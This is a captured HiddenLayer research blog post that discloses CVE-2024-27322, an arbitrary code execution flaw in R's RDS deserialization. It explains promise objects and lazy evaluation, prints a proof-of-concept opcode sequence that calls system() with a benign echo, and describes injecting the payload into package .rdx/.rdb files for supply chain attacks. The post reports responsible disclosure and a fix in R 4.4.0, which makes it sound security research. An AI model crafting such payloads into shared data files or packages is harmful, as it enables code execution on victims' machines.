hiddenlayer.com Open in urlscan Pro
141.193.213.20  Public Scan

URL: https://hiddenlayer.com/research/r-bitrary-code-execution/
Submission: On May 10 via api from LU — Scanned from DE

Form analysis 0 forms found in the DOM

Text Content

 * Platform
    * AISec Platform
    * AI Detection & Response
    * Model Scanner

 * Services
 * Research
   * AI Threat Landscape Report 2024
   * Forrester Opportunity Snapshot
   * HiddenLayer and Intel eBook
 * Partner
    * Go-To-Market Partner
    * Technology Alliance
    * Apply

 * Company
   * Newsroom
 * Book a Demo



 * Platform
    * AISec Platform
    * AI Detection & Response
    * Model Scanner

 * Services
 * Research
   * AI Threat Landscape Report 2024
   * Forrester Opportunity Snapshot
   * HiddenLayer and Intel eBook
 * Partner
    * Go-To-Market Partner
    * Technology Alliance
    * Apply

 * Company
   * Newsroom
 * Book a Demo

Back to Research
Research
04.29.2024
Adversarial Machine Learning Cyber Threat Intelligence Cybersecurity


R-BITRARY CODE EXECUTION: VULNERABILITY IN R’S DESERIALIZATION

By: Kasimir Schulz, Kieran Evans



TABLE OF CONTENTS

Summary Introduction Vulnerability Overview R Supply Chain Attacks Conclusion


SUMMARY

HiddenLayer researchers have discovered a vulnerability, CVE-2024-27322, in the
R programming language that allows for arbitrary code execution by deserializing
untrusted data. This vulnerability can be exploited through the loading of RDS
(R Data Serialization) files or R packages, which are often shared between
developers and data scientists. An attacker can create malicious RDS files or R
packages containing embedded arbitrary R code that executes on the victim’s
target device upon interaction.


INTRODUCTION

WHAT IS R?

R is an open-source programming language and software environment for
statistical computing, data visualization, and machine learning. Consisting of a
strong core language and an extensive list of libraries for additional
functionality, it is only natural that R is popular and widely used today, often
being the only programming language that statistics students learn in school. As
a result, the R language holds a significant share in industries such as
healthcare, finance, and government, each employing it for its prowess in
performing statistical analysis in large datasets. Due to its usage with large
datasets, R has also become increasingly popular in the AI/ML field.

To further underscore R’s pervasiveness, many R conferences are hosted around
the world, such as the R Gov Conference, which features speakers from major
organizations such as NASA, the World Health Organization (WHO), the US Food and
Drug Administration (FDA), the US Army, and so on. R’s use within the biomedical
field is also very established, with pharmaceutical giants like Pfizer and Merck
& Co. actively speaking about R at similar conferences. 

R has a dedicated following even in the open-source community, with projects
like Bioconductor being referenced in their documentation, boasting over 42
million downloads and 18,999 active support site members last year. R users love
R – which is even more evident when we consider the R equivalent to Python’s
PyPI – CRAN.

The Comprehensive R Archive Network (CRAN) repository hosts over 20,000 packages
to date. The R-project website also links to the project repository R-forge,
which claims to host over 2,000 projects with over 15,000 registered users at
the time of writing. 

All of this is to say that the exploitation of a code execution vulnerability in
R can have far-reaching implications across multiple verticals, including but
not limited to vital government agencies, medical, and financial institutions.

So, how does an attack on R work? To understand this, we have to look at the R
Data Serialization process, or RDS, for short.

WHAT IS RDS?

Before explaining what RDS is in relation to R, we will first give a brief
overview of data serialization. Serialization is the process of converting a
data structure or object into a format that can be stored locally or transferred
over a network. Conversely, serialized objects can be reconstructed
(deserialized) for use as and when needed. As HiddenLayer’s SAI team has
previously written about, the serialization and deserialization of data can
often be vulnerable to exploitation when callable objects are involved in the
process.

R has a serialization format of its own whereby a user can serialize an object
using saveRDS and deserialize it using readRDS. It’s worth mentioning that this
format is also leveraged when R packages are saved and loaded. When a package is
compiled, a .rdb file containing serialized representations of objects to be
included is created. The .rdb file is accompanied by a .rdx file containing
metadata relating to the binary blobs now stored in the .rdb file. When the
package is loaded, R uses the .rdx index file to locate the data stored in the
.rdb file and load it into RDS format.

Multiple functions within R can be used to serialize and deserialize data, which
slightly differ from each other but ultimately leverage the same internal code.
For example, the serialize() function works slightly differently from the
saveRDS() function, and the same is true for their counterpart functions:
unserialize() and readRDS(); as you will see later, both of these work their way
through to the same internal function for deserializing the data.


VULNERABILITY OVERVIEW

Our team discovered that it is possible to craft a malicious RDS file that will
execute arbitrary code when loaded and referenced. This vulnerability, assigned
CVE-2024-27322, involves the use of promise objects and lazy evaluation in R.

R’S INTERPRETED SERIALIZATION FORMAT

As we mentioned earlier, several functions and code paths lead to an RDS file or
blob getting deserialized. However, regardless of where that request originated,
it eventually leads to the R_Unserialize function inside of serialize.c, which
is what our team honed in on. Like most other formats, RDS contains a header,
which is the first component parsed by the R_Unserialize function. 

The header for an RDS binary blob contains five main components:

 * the file format
 * the version of the file
 * the R version that was used to serialize the blob
 * the minimum R version needed to read the blob
 * depending on the version number, a string representing the native encoding.

RDS files can be either an ASCII format, a binary format, or an XDR format, with
the XDR format being the most prevalent. Each has its own magic numbers, which,
while only needing one byte, are stored in two bytes; however, due to an issue
with the ASCII format, files can sometimes have a magic number of three bytes in
the header. After reading the two – or sometimes three – byte magic number for
the format, the R_Unserialize function reads the other header items, which are
each considered an integer (4 bytes for both the XDR and binary formats and up
to 127 bytes for the ASCII format). If the file version is 2, no header checks
are performed. If the file version is 3, then the function reads another
integer, checks its size, and then reads a string of the length into the
native_encoding variable, which is set to ‘UTF-8’ by default. If the version is
neither 2 nor 3, then the writer version and minimum reader versions are
checked. Once the header has been read and validated, the function tries to read
an item from the blob.

The RDS format is interesting because while consisting of bytecode that gets
parsed and run in the interpreter inside the ReadItem function, the instructions
do not include a halt, stop, or return command. The deserialization function
will only ever return one object, and once that object has been read, the
parsing will end. This means that one technical challenge for an exploit is that
it needs to fit naturally into an existing object type and cannot be inserted
before or after the returned object. However, despite this limitation, almost
all objects in the R language can be serialized and deserialized using RDS due
to attributes, tags, and nested values through the internal CAR and CDR
structures. 

The RDS interpreter contains 36 possible bytecode instructions in the ReadItem
function, with several additional instructions becoming available when used in
relation to one of the main instructions. RDS instructions all have different
lengths based on what they do; however, they all start with one integer that is
encoded with the instruction and all of the flags through bit masking.

THE PROMISE OF AN EXPLOIT

After spending some time perusing the deserialization code, we found a few
functions that seemed questionable but did not have an actual vulnerability,
that is, until we came across an instruction that created the promise object. To
understand the promise object, we need to first understand lazy evaluation. Lazy
evaluation is a strategy that allows for symbols to be evaluated only when
needed, i.e., when they are accessed. One such example is the delayedAssign
function that allows a variable to be assigned once it has been accessed:

Figure 1: DelayedAssign Function

The above is achieved by creating a promise object that has both a symbol and an
expression attached to it. Once the symbol ‘y’ is accessed, the expression
assigning the value of ‘x’ to ‘y’ is run. The key here is that ‘y’ is not
assigned the value 1 because ‘y’ is not assigned to ‘x’ until it is accessed.
While we were not successful in gaining code execution within the
deserialization code itself, we thought that since we could create all of the
needed objects, it might be possible to create a promise that would be evaluated
once someone tried to use whatever had been deserialized.

THE UNBOUNDED PROMISE

After some research, we found that if we created a promise where instead of
setting a symbol, we set an unbounded value, we could create a payload that
would run the expression when the promise was accessed:

Opcode(TYPES.PROMSXP, 0, False, False, False,None,False),
Opcode(TYPES.UNBOUNDVALUE_SXP, 0, False, False, False,None,False),
Opcode(TYPES.LANGSXP, 0, False, False, False,None,False),
Opcode(TYPES.SYMSXP, 0, False, False, False,None,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,"system",False),
Opcode(TYPES.LISTSXP, 0, False, False, False,None,False),
Opcode(TYPES.STRSXP, 0, False, False, False,1,False),
Opcode(TYPES.CHARSXP, 64, False, False, False,'echo "pwned by HiddenLayer"',False),
Opcode(TYPES.NILVALUE_SXP, 0, False, False, False,None,False),

Once the malicious file has been created and loaded by R, the exploit will run
no matter how the variable is referenced:

Figure 2: readRDS Exploited


R SUPPLY CHAIN ATTACKS

SHARING OBJECTS

After searching GitHub, our team discovered that readRDS, one of the many ways
this vulnerability can be exploited, is referenced in over 135,000 R source
files. Looking through the repositories, we found that a large amount of the
usage was on untrusted, user-provided data, which could lead to a full
compromise of the system running the program. Some source files containing
potentially vulnerable code included projects from R Studio, Facebook, Google,
Microsoft, AWS, and other major software vendors.

R PACKAGES

R packages allow for the sharing of compiled R code and data that can be
leveraged by others in their statistical tasks. As previously mentioned, at the
time of writing, the CRAN package repository claims to feature 20,681 available
packages. Packages can be uploaded to this repository by anybody; there are
criteria a package must fulfill in order to be accepted, such as the fact that
the package must contain certain files (such as a description) and must pass
certain automated checks (which do not check for this vulnerability).

To recap, R packages leverage the RDS format to save and load data. When a
package is compiled, two files are created that facilitate this:

 * .rdb file: objects to be included within the package are serialized into this
   file as binary blobs of data;
 * .rdx file: contains metadata associated with each serialized object within
   the .rbd file, including their offsets.

When a package is loaded, the metadata stored in the RDS format within the .rdx
file is used to locate the objects within the .rdb file. These objects are then
decompressed and deserialized, essentially loading them as RDS files. 

This means R packages are vulnerable to the deserialization vulnerability and
can, therefore, be used as part of a supply chain attack via package
repositories. For an attacker to take over an R package, all they need to do is
overwrite the .rdx file with the maliciously crafted file, and when the package
is loaded, it will automatically execute the code:

If one of the main system packages, such as compiler, has been modified, then
the malicious code will run when R is initialized.


However, one of the most dangerous components of this vulnerability is that
instead of simply replacing the .rdx file, the exploit can be injected into any
of the offsets inside of the RDB file, making it incredibly difficult to detect.


CONCLUSION

R is an open-source statistical programming language used across multiple
critical sectors for statistical computing tasks and machine learning. Its
package building and sharing capabilities make it flexible and community-driven.
However, a drawback to this is that not enough scrutiny is being placed on
packages being uploaded to repositories, leaving users vulnerable to supply
chain attacks.

R’s serialization and deserialization process, which is used in the process of
creating and loading RDS files and packages, has an arbitrary code execution
vulnerability. An attacker can exploit this by crafting a file in RDS format
that contains a promise instruction setting the value to unbound_value and the
expression to contain arbitrary code. Due to lazy evaluation, the expression
will only be evaluated and run when the symbol associated with the RDS file is
accessed. Therefore if this is simply an RDS file, when a user assigns it a
symbol (variable) in order to work with it, the arbitrary code will be executed
when the user references that symbol. If the object is compiled within an R
package, the package can be added to an R repository such as CRAN, and the
expression will be evaluated and the arbitrary code run when a user loads that
package.

Given the widespread usage of R and the readRDS function, the implications of
this are far-reaching. Having followed our responsible disclosure process, we
have worked closely with the team at R who have worked quickly to patch this
vulnerability within the most recent release – R v4.4.0. In addition,
HiddenLayer’s AISec Platform will provide additional protection from this
vulnerability in its Q2 product release.

Share this post:

 * Share on Facebook
 * Share on Twitter
 * Share on Linkedin
 * Share by Mail

Previous Post Next Post


RELATED POSTS

Research 03.27.2024
Adversarial Machine Learning, Cybersecurity, Data Scientists
March 27, 2024

PROMPT INJECTION ATTACKS ON LLMS

Read More
Adversarial Machine Learning Cybersecurity Data Scientists
Research 02.21.2024
Hugging Face, Malicious models, Safetensors, Supply Chain, Vulnerability
research
February 21, 2024

HIJACKING SAFETENSORS CONVERSION ON HUGGING FACE

Read More
Hugging Face Malicious models Safetensors
Research 01.25.2024
AI Security, Cybersecurity, Education
January 25, 2024

A GUIDE TO UNDERSTANDING NEW CISA GUIDELINES

Read More
AI Security Cybersecurity Education

HiddenLayer, a Gartner recognized AI Application Security company, is a provider
of security solutions for artificial intelligence algorithms, models & the data
that power them. With a first-of-its-kind, non-invasive software approach to
observing & securing AI, HiddenLayer is helping to protect the world’s most
valuable technologies.

Book a Demo
 * Platform
 * Services
 * Research
 * Partner
 * Company
   * Newsroom
 * Careers
 * Contact

© 2024 HiddenLayer





Security Privacy Policy  Vulnerability Disclosure Policy Sitemap 


 * Twitter
 * Linkedin



Scroll to top